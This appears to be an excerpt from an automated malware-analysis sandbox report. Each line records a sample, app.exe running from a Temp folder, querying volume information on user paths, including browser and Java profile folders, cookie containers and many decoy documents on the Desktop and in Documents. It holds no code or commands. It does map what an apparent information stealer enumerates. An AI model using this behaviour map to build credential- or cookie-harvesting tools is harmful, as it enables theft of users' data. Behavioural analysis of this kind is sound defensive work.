Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\SystemExtensionsDev VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Sun\Java VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformation
